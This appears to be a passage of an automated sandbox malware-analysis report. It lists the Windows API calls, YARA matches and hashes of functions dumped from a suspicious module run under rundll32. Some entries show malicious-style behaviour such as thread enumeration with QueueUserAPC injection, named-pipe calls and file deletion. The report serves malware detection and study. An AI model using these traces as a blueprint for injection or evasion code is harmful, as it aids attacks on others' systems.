                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                            • String ID:
                            • API String ID: 3873609385-0
                            • Opcode ID: e322e37dae23c43837d1a2e2eda919a58b331382f327ddd401fc91d6d85f98ee
                            • Instruction ID: f7e6cb79f3f09cda20f610fc0697546feb6ca2648566ab802a282d23d765ea08
                            • Opcode Fuzzy Hash: e322e37dae23c43837d1a2e2eda919a58b331382f327ddd401fc91d6d85f98ee
                            • Instruction Fuzzy Hash: 3D11757264025DBFE3122EA4BC8CE7B3B9CEB46665B00002EFD46DA140DA5D5D46E6B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F67FFF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • StrChrA.SHLWAPI(00000000,0000002C,76ECD3B0,00000000,761B5520,7620F710), ref: 04F68030
                            • StrChrA.SHLWAPI(00000001,0000002C), ref: 04F68043
                            • StrTrimA.SHLWAPI(00000000,?), ref: 04F68066
                            • StrTrimA.SHLWAPI(00000001,?), ref: 04F68075
                            • lstrlen.KERNEL32(00000000), ref: 04F680AA
                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04F680BD
                            • lstrcpy.KERNEL32(00000004,00000000), ref: 04F680DB
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F680FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                            • String ID: W
                            • API String ID: 1974185407-655174618
                            • Opcode ID: d7496499bbf4fc6574571aa4605159833747c552bf492a78f91ac2d7d04d5477
                            • Instruction ID: a328161c9027e58ff70c11d8cc9e12265dde4f05773812fd0249ef42908f60aa
                            • Opcode Fuzzy Hash: d7496499bbf4fc6574571aa4605159833747c552bf492a78f91ac2d7d04d5477
                            • Instruction Fuzzy Hash: 0D314075901219FFDB11AF68EC44EAA7BB9EF09780F15405EF9059B200E678AD42DFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F73C97 Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(0631CBB8,00000000,00000000,00000000,?), ref: 04F73CBA
                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 04F73CC9
                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 04F73CD6
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 04F73CEE
                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 04F73CFA
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F73D16
                            • wsprintfA.USER32 ref: 04F73DF8
                            • memcpy.NTDLL(00000000,00004000,?), ref: 04F73E45
                            • InterlockedExchange.KERNEL32(04F8A128,00000000), ref: 04F73E63
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F73EA4
                              • Part of subcall function 04F7E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04F7E3F6
                              • Part of subcall function 04F7E3CD: memcpy.NTDLL(00000000,?,?), ref: 04F7E409
                              • Part of subcall function 04F7E3CD: RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F7E41A
                              • Part of subcall function 04F7E3CD: RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F7E42F
                              • Part of subcall function 04F7E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04F7E467
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                            • String ID:
                            • API String ID: 4198405257-0
                            • Opcode ID: 04991c53a682fd02c0507bd3405ab54f448574db6fbbb063104d41628beaa61e
                            • Instruction ID: 735edd3261d615f63ea47cf83c32ea50cb19fcc1a9bbc1690fe2c57f1569d5b5
                            • Opcode Fuzzy Hash: 04991c53a682fd02c0507bd3405ab54f448574db6fbbb063104d41628beaa61e
                            • Instruction Fuzzy Hash: 6E611B72A0020DFFDB11DFA5EC84EAA7BA9EB04304F04846EF915DB250D778E956DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F78CF3 Relevance: 15.1, APIs: 10, Instructions: 110librarymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,04F69100,?), ref: 04F78D13
                            • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D1D
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D46
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D54
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D62
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D70
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D7E
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78D8C
                            • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 04F78DB6
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,04F69100,?), ref: 04F78E37
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load$Library$AllocDll@4FreeHeapImports
                            • String ID:
                            • API String ID: 1792504554-0
                            • Opcode ID: 201f828b6beb9dfdd4bc5483743ffd7722ec2b7f04721b45897d38ce8a6c765f
                            • Instruction ID: ebf54ed28a7a9c166c3d7c137d7ff3502e41d5167aa1c0962b2e28ba2006597b
                            • Opcode Fuzzy Hash: 201f828b6beb9dfdd4bc5483743ffd7722ec2b7f04721b45897d38ce8a6c765f
                            • Instruction Fuzzy Hash: 62411871E00619EFDB01EFA8E888DA977E8EB08204B1444ABF609DF241D379BD468F50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7E8BB Relevance: 15.1, APIs: 10, Instructions: 98filememorystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F62F91: memset.NTDLL ref: 04F62FB3
                              • Part of subcall function 04F62F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04F6305D
                            • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 04F7E903
                            • CloseHandle.KERNEL32(?), ref: 04F7E90F
                            • PathFindFileNameW.SHLWAPI(?), ref: 04F7E91F
                            • lstrlenW.KERNEL32(00000000), ref: 04F7E928
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F7E939
                            • wcstombs.NTDLL ref: 04F7E948
                            • lstrlen.KERNEL32(?), ref: 04F7E955
                            • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 04F7E994
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7E9A7
                            • DeleteFileW.KERNEL32(?), ref: 04F7E9B4
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                            • String ID:
                            • API String ID: 2256351002-0
                            • Opcode ID: ce582a355dd951f20757058a0c123075d018855a70c50661414e3464aa2e5d12
                            • Instruction ID: 4eaf621c048567a77453e7eb85d3821319e03dd56b474f090257fe147da19d17
                            • Opcode Fuzzy Hash: ce582a355dd951f20757058a0c123075d018855a70c50661414e3464aa2e5d12
                            • Instruction Fuzzy Hash: 27316E36900209BFDB219FA5ED48DAF7FB9EF45315F00006AF901AA150DB39AD15DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7B9E9 Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTickCount.KERNEL32 ref: 04F7B9F9
                            • CreateFileW.KERNEL32(04F70971,80000000,00000003,04F8A1E8,00000003,00000000,00000000,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA16
                            • GetLastError.KERNEL32(?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BABE
                              • Part of subcall function 04F8087A: lstrlen.KERNEL32(?,00000000,04F7BA3E,00000027,04F8A1E8,?,00000000,?,?,04F7BA3E,?,00000001,?,04F70971,00000000,?), ref: 04F808B0
                              • Part of subcall function 04F8087A: lstrcpy.KERNEL32(00000000,00000000), ref: 04F808D4
                              • Part of subcall function 04F8087A: lstrcat.KERNEL32(00000000,00000000), ref: 04F808DC
                            • GetFileSize.KERNEL32(04F70971,00000000,?,00000001,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA49
                            • CreateFileMappingA.KERNEL32(04F70971,04F8A1E8,00000002,00000000,00000000,04F70971), ref: 04F7BA5D
                            • lstrlen.KERNEL32(04F70971,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA79
                            • lstrcpy.KERNEL32(?,04F70971), ref: 04F7BA89
                            • GetLastError.KERNEL32(?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA91
                            • HeapFree.KERNEL32(00000000,04F70971,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BAA4
                            • CloseHandle.KERNEL32(04F70971,?,00000001,?,04F70971), ref: 04F7BAB6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                            • String ID:
                            • API String ID: 194907169-0
                            • Opcode ID: 870a44ff8c9e4ef9f74851774627eed9c6df887f31ff9487dd3bb40d60219d84
                            • Instruction ID: 9cfef4f5914852ae5ff7502872d48377a3a3e5855e070a7e5bb28c4b8d8f2d1c
                            • Opcode Fuzzy Hash: 870a44ff8c9e4ef9f74851774627eed9c6df887f31ff9487dd3bb40d60219d84
                            • Instruction Fuzzy Hash: 18210A71900209FFDB10AFA4EC48AAE7FB8EF05354F10846AF915EA250D338AE459B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6EE04 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                            Download Yara Rule
                            APIs
                            • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 04F6EE2A
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04F6EE36
                            • GetModuleHandleA.KERNEL32(?,0631978E,00000000,?,00000000), ref: 04F6EE56
                            • GetProcAddress.KERNEL32(00000000), ref: 04F6EE5D
                            • Thread32First.KERNEL32(?,0000001C), ref: 04F6EE6D
                            • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 04F6EE88
                            • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 04F6EE99
                            • CloseHandle.KERNEL32(00000000), ref: 04F6EEA0
                            • Thread32Next.KERNEL32(?,0000001C), ref: 04F6EEA9
                            • CloseHandle.KERNEL32(?), ref: 04F6EEB5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                            • String ID:
                            • API String ID: 2341152533-0
                            • Opcode ID: ad9d1f3139390f357031115611009873051e25bde934e4f67e2b365fabbb1963
                            • Instruction ID: c99f7a85d281ddfb8b4ad6f3ecd18ca76d740e9223b9856fa24f2b50af3f4d3c
                            • Opcode Fuzzy Hash: ad9d1f3139390f357031115611009873051e25bde934e4f67e2b365fabbb1963
                            • Instruction Fuzzy Hash: D8214F76A0010CFFDF01AFE4EC84DEE7BB9EB18359B05412AF601AA150D735AD46DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6DC41 Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • SetEvent.KERNEL32(00000000,?,04F7507B), ref: 04F6DC56
                              • Part of subcall function 04F75D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 04F75D59
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,04F7507B), ref: 04F6DC76
                            • CloseHandle.KERNEL32(00000000,?,04F7507B), ref: 04F6DC7F
                            • CloseHandle.KERNEL32(00000000,?,?,04F7507B), ref: 04F6DC89
                            • RtlEnterCriticalSection.NTDLL(?), ref: 04F6DC91
                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04F6DCA9
                            • Sleep.KERNEL32(000001F4), ref: 04F6DCB8
                            • CloseHandle.KERNEL32(00000000), ref: 04F6DCC5
                            • LocalFree.KERNEL32(?), ref: 04F6DCD0
                            • RtlDeleteCriticalSection.NTDLL(?), ref: 04F6DCDA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                            • String ID:
                            • API String ID: 1408595562-0
                            • Opcode ID: dfcecab49b5f2603d53174534d3abfffd6ae0cbfb7a3c7baea65c082d022392b
                            • Instruction ID: 3e850d779d645c021b6e2e3f58c32087d34ea3786bba3f17ca9c0f1ef1c96aed
                            • Opcode Fuzzy Hash: dfcecab49b5f2603d53174534d3abfffd6ae0cbfb7a3c7baea65c082d022392b
                            • Instruction Fuzzy Hash: F4119A71A00B1EEBCB206F65ED4896ABBB8FF047443140919F18396450DB79F802CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6DD7B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,04F63DA2,00000000,00000001,?,?,?), ref: 04F6DD92
                            • lstrlen.KERNEL32(?), ref: 04F6DDA2
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F6DDD6
                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 04F6DE01
                            • memcpy.NTDLL(00000000,?,?), ref: 04F6DE20
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6DE81
                            • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 04F6DEA3
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Allocatelstrlenmemcpy$Free
                            • String ID: W
                            • API String ID: 3204852930-655174618
                            • Opcode ID: 0045c674473426be05a4880a66c01308a2d723ebfebf03881f74175586139272
                            • Instruction ID: 5fe7b28ed58f629918c5ab3a97ca8e5e60abb1db9f3849143bf8c5aa3236bd24
                            • Opcode Fuzzy Hash: 0045c674473426be05a4880a66c01308a2d723ebfebf03881f74175586139272
                            • Instruction Fuzzy Hash: 14414B72E0020EEFDF11DF54DC80AAE7BB9FF64348F144469E915AB210E734AA559BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6A107 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F6D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?,?,00000000), ref: 04F6D435
                              • Part of subcall function 04F6D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?), ref: 04F6D493
                              • Part of subcall function 04F6D429: lstrcpy.KERNEL32(00000000,00000000), ref: 04F6D4A3
                            • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 04F6A153
                            • wsprintfA.USER32 ref: 04F6A181
                            • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 04F6A1DF
                            • GetLastError.KERNEL32 ref: 04F6A1F6
                            • ResetEvent.KERNEL32(?), ref: 04F6A20A
                            • ResetEvent.KERNEL32(?), ref: 04F6A20F
                            • GetLastError.KERNEL32 ref: 04F6A227
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                            • String ID: `
                            • API String ID: 2276693960-1850852036
                            • Opcode ID: c9aff2d8f04db72773f52996ee6b8bce2071b42aae6c0ae073fb18d18cfe724b
                            • Instruction ID: 52f29b812256f3d47c767c89e57f0c916e88262f31d40419a2347f54b169a582
                            • Opcode Fuzzy Hash: c9aff2d8f04db72773f52996ee6b8bce2071b42aae6c0ae073fb18d18cfe724b
                            • Instruction Fuzzy Hash: 6C418F7190060AEFDF11DFA4ED48BAE7BB8FF05314F00445AF912A6150E775EA15CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F63172 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(04F643C6,00000000,?,?,?,?,04F643C6,00000035,00000000,?,00000000), ref: 04F631A2
                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F631B8
                            • memcpy.NTDLL(00000010,04F643C6,00000000,?,?,04F643C6,00000035,00000000), ref: 04F631EE
                            • memcpy.NTDLL(00000010,00000000,00000035,?,?,04F643C6,00000035), ref: 04F63209
                            • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04F63227
                            • GetLastError.KERNEL32(?,?,04F643C6,00000035), ref: 04F63231
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F643C6,00000035), ref: 04F63254
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                            • String ID: (
                            • API String ID: 2237239663-3887548279
                            • Opcode ID: dd2e03d16b38cc101eb25112f960984f4270adc432708bb8578d0da489c67cbe
                            • Instruction ID: e5b830010ad16a6178c49b53b0952430d27ab46cf9dfe2a6884cec5e02720fb3
                            • Opcode Fuzzy Hash: dd2e03d16b38cc101eb25112f960984f4270adc432708bb8578d0da489c67cbe
                            • Instruction Fuzzy Hash: C7316136900209FFDB21CF95EC45AAB7BB8FB44754F044429FD46E6210D234AE55DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F77736 Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL ref: 04F77777
                            • memset.NTDLL ref: 04F7778B
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • GetCurrentThreadId.KERNEL32 ref: 04F77818
                            • GetCurrentThread.KERNEL32 ref: 04F7782B
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F778D2
                            • Sleep.KERNEL32(0000000A), ref: 04F778DC
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F77902
                            • HeapFree.KERNEL32(00000000,?), ref: 04F77930
                            • HeapFree.KERNEL32(00000000,00000018), ref: 04F77943
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                            • String ID:
                            • API String ID: 1146182784-0
                            • Opcode ID: 3615f369218ce2d3e8e5353fff6c72f99cf2688314a6a5db316f162a89454ef0
                            • Instruction ID: 0573e96a5b524f112f3a247e4492aec505c3b0316fb454c0e05b68c40795f3fd
                            • Opcode Fuzzy Hash: 3615f369218ce2d3e8e5353fff6c72f99cf2688314a6a5db316f162a89454ef0
                            • Instruction Fuzzy Hash: 225129B1A04745AFD710EF64E88486ABBF8FB48344F104D2EF585DB211D738ED4A9B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F72812 Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F770C3: RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F770CB
                              • Part of subcall function 04F770C3: RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F770E0
                              • Part of subcall function 04F770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 04F770F9
                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04F7284F
                            • memset.NTDLL ref: 04F72860
                            • lstrcmpi.KERNEL32(?,?), ref: 04F728A0
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F728CC
                            • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,04F78974), ref: 04F728E0
                            • memset.NTDLL ref: 04F728ED
                            • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04F72906
                            • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04F72929
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,04F78974), ref: 04F72946
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                            • String ID:
                            • API String ID: 694413484-0
                            • Opcode ID: ce0cbcd4d8db12ef2c0019bbade86463604369ac84d86170ccdf52346632b4b4
                            • Instruction ID: 3119319747f3c8f8aed0ba8d8c91f92e10178e0ef6c11bf1c49266807b36ba96
                            • Opcode Fuzzy Hash: ce0cbcd4d8db12ef2c0019bbade86463604369ac84d86170ccdf52346632b4b4
                            • Instruction Fuzzy Hash: 9641A072E00219FFDB109FA4EC84BADBBB9FF08314F15406AE505AB251D739AE469B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7C9B5 Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7C9CC
                            • lstrlen.KERNEL32(?), ref: 04F7C9D4
                            • lstrlen.KERNEL32(?), ref: 04F7CA3F
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7CA6A
                            • memcpy.NTDLL(00000000,00000002,?), ref: 04F7CA7B
                            • memcpy.NTDLL(00000000,?,?), ref: 04F7CA91
                            • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 04F7CAA3
                            • memcpy.NTDLL(00000000,04F853E8,00000002,00000000,?,?,00000000,?,?), ref: 04F7CAB6
                            • memcpy.NTDLL(00000000,?,00000002), ref: 04F7CACB
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$lstrlen$AllocateHeap
                            • String ID:
                            • API String ID: 3386453358-0
                            • Opcode ID: c9e805d998b9dfc325079aa665e5ae69ff7b666ba29d39f647f8bc4303c78966
                            • Instruction ID: 50b04cfdf668b3fbce458db5483ce0ee5b682d90a98f7925eb6e5443c395a883
                            • Opcode Fuzzy Hash: c9e805d998b9dfc325079aa665e5ae69ff7b666ba29d39f647f8bc4303c78966
                            • Instruction Fuzzy Hash: 6F415076D0021AFBDF00DFA8CC80A9EBBB8EF48315F14405AE905A7201E775EA51DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6605B Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F770C3: RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F770CB
                              • Part of subcall function 04F770C3: RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F770E0
                              • Part of subcall function 04F770C3: InterlockedIncrement.KERNEL32(0000001C), ref: 04F770F9
                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F660AC
                            • lstrlen.KERNEL32(00000008,?,?,?,04F7F140,00000000,00000000,-00000008), ref: 04F660BB
                            • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 04F660CD
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,04F7F140,00000000,00000000,-00000008), ref: 04F660DD
                            • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,04F7F140,00000000,00000000,-00000008), ref: 04F660EF
                            • lstrcpy.KERNEL32(00000020), ref: 04F66121
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F6612D
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F66185
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 3746371830-0
                            • Opcode ID: c180e473ab0f76a113bd9cee75b81bd0d53e2c0cfc32bc2bd976367555ae66a6
                            • Instruction ID: c5a5cf44da5a0a09dc47b321d44d434d284ce226dc2bcd36a0df6fc735b803d9
                            • Opcode Fuzzy Hash: c180e473ab0f76a113bd9cee75b81bd0d53e2c0cfc32bc2bd976367555ae66a6
                            • Instruction Fuzzy Hash: 8D417671900709EFEB219F54E844B6ABBF8FF08704F10851EE80A9A212D739A955DF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7FBF1 Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F75119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F7514B
                              • Part of subcall function 04F75119: HeapFree.KERNEL32(00000000,00000000,?,?,04F7FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 04F75170
                              • Part of subcall function 04F779A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,04F7FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 04F779DC
